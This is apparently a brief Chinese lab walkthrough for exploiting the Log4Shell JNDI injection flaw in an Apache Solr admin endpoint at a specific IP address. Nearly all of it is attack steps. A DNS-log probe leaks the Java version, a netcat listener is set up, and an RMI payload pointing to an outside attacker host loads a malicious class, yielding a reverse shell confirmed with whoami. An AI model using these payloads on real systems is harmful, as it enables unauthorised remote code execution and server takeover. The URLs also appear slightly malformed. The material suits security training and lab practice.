1,打开环境后访问该ip
2,打开dnslog.cn,获取一个域名,我们这里是2bfvl6.dnslog.cn
3,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn}
4,返回dnslog.cn查看是否有回显
5,反弹Shell
6,再打开一个宝塔进行监听
nc -lvvp 5555
7,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:rmi://45.122.51.245:1099/5ltonm}可以看到⽹⻚被重定向到了我们的恶意类⽹址,回到宝塔查看
8,通过whoami来获得服务器权限
